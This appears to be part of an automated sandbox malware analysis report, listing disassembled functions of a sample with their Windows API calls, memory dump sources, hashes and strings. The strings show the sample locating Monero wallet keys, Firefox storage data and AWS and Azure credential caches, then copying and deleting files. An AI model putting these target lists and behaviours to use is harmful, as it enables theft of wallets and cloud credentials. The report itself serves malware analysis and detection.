                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1FE3
                                  • lstrlen.KERNEL32(00411794), ref: 003E1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E200E
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E204D
                                  • lstrlen.KERNEL32(00411794), ref: 003E2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2075
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E20AC
                                  • lstrlen.KERNEL32(?), ref: 003E20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2139
                                  • lstrlen.KERNEL32(00411794), ref: 003E214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E216B
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E21D4
                                  • lstrlen.KERNEL32(?), ref: 003E21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E2218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2242
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E227F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003E228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E22B1
                                  • lstrcat.KERNEL32(00000000,011AEEB8), ref: 003E22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E22F7
                                  • lstrcat.KERNEL32(00000000), ref: 003E2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003E2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003E23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003E2444
                                  • FindClose.KERNEL32(00000000), ref: 003E2453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 9faad7c9d9eca9cbdb9db36efdb02d8a4ae714abaa87730546a2e570fa6be45e
                                  • Instruction ID: 41ca9840f00e0b3fb92ff302b272f9b56866727d226b3da9b427d179c835edf8
                                  • Opcode Fuzzy Hash: 9faad7c9d9eca9cbdb9db36efdb02d8a4ae714abaa87730546a2e570fa6be45e
                                  • Instruction Fuzzy Hash: 47E162319102AA9FCB22EF76DC85ADF77BDAF04300F055225F905AB291DB74ED518BA0
                                  Function 003F6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6445
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003F64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 0ed86fff5e435e6b537436f128895078d2fbf49effdea357781bca0656562058
                                  • Instruction ID: 70c285fab2b2f25c701c818abd75259aa8107b90805363f00bf2a8882859b25f
                                  • Opcode Fuzzy Hash: 0ed86fff5e435e6b537436f128895078d2fbf49effdea357781bca0656562058
                                  • Instruction Fuzzy Hash: 39F1CF7190025A9BCB23EF75D84AABF77B9AF04300F059229F905EB291DB34DD45CBA0
                                  Function 003F4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F43A3
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 003F4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003F443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F44DF
                                  • lstrlen.KERNEL32(00411794), ref: 003F44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4507
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 003F451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003F4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003F45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F467B
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: fbb1784cd1b253dcfcf00f30c1083671e507602f445844c8a21433c12282341d
                                  • Instruction ID: 80fbe67f2880f15308ba736bf1579444825ed2ea614b760f928eea0d34e99e9b
                                  • Opcode Fuzzy Hash: fbb1784cd1b253dcfcf00f30c1083671e507602f445844c8a21433c12282341d
                                  • Instruction Fuzzy Hash: BFB1E331A1025A9BCB23EF75DD49AAF77ADAF00700F055225F905EB291DF74ED118BA0
                                  Function 003F57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003F5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F58F8
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5988
                                  • lstrlen.KERNEL32(00411794), ref: 003F599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F59B9
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F59C5
                                  • lstrlen.KERNEL32(011AED80), ref: 003F59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003F5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5BB5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 8878de4a9d7815bbc34a94a3f8bbbb9e97d6b3448c597932ef33b9e713c1e59d
                                  • Instruction ID: 81465012aadac4d1bf9a14a0eae66e381ad59c4e8eeac4bf66dd334b34a634e9
                                  • Opcode Fuzzy Hash: 8878de4a9d7815bbc34a94a3f8bbbb9e97d6b3448c597932ef33b9e713c1e59d
                                  • Instruction Fuzzy Hash: 9702D371A0165A9FCB23EF79C889AAF7BB9AF04300F054229FA05D7291DB74DD41CB90
                                  Function 003E1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003E1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E1135
                                    • Part of subcall function 003E1120: RtlAllocateHeap.NTDLL(00000000), ref: 003E113C
                                    • Part of subcall function 003E1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003E1159
                                    • Part of subcall function 003E1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003E1173
                                    • Part of subcall function 003E1120: RegCloseKey.ADVAPI32(?), ref: 003E117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003E11C0
                                  • lstrlen.KERNEL32(?), ref: 003E11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003E11E8
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E121F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1251
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003E1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 003E1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 003E1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E12BA
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E12FF
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003E130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1378
                                  • lstrcat.KERNEL32(00000000), ref: 003E1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003E13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E143D
                                    • Part of subcall function 003FEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003FEE12
                                  • DeleteFileA.KERNEL32(?), ref: 003E1471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: 8a0d6a70965d4a0f7fe4985ba24ff27aa75133e585210b142e4c691b6c60b3b1
                                  • Instruction ID: 5ed13b069a9694c1d65fe29650482e0fc905d9f9c5b22c9f504dcc27809e2763
                                  • Opcode Fuzzy Hash: 8a0d6a70965d4a0f7fe4985ba24ff27aa75133e585210b142e4c691b6c60b3b1
                                  • Instruction Fuzzy Hash: 20A1A271A002669BCB22EF76DC89ADF77B9AF44300F055625F905EB2D1DB70ED418BA0
                                  Function 003FE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 003FE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003FE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 003FE7C6
                                  • memset.MSVCRT ref: 003FE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003FE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 003FE886
                                  • memset.MSVCRT ref: 003FE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003FE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003FE947
                                  • memset.MSVCRT ref: 003FE986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: 6b0d5864ac217c4d70ea77cf660bda3ff39bc5a0b4eecc52e57dc71444bcd5da
                                  • Instruction ID: 6391a7f839d05a9b5a278a5f960fe1592779870ea6fc62d7cb965e65fc14127c
                                  • Opcode Fuzzy Hash: 6b0d5864ac217c4d70ea77cf660bda3ff39bc5a0b4eecc52e57dc71444bcd5da
                                  • Instruction Fuzzy Hash: CE712B71E40268ABD722EB60DC46FEE7378AF48700F1445A9B7199B1C0DFB49E848B64
                                  Function 003FABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 003FABCF
                                  • lstrlen.KERNEL32(011B0358), ref: 003FABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FACB7
                                  • lstrlen.KERNEL32(00414AD4), ref: 003FACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FACF3
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003FACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD28
                                  • lstrlen.KERNEL32(00414AD4), ref: 003FAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD5C
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003FAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD91
                                  • lstrlen.KERNEL32(011B02E0), ref: 003FADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 003FAE85
                                  • lstrcpy.KERNEL32(00000000,011B0400), ref: 003FAEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
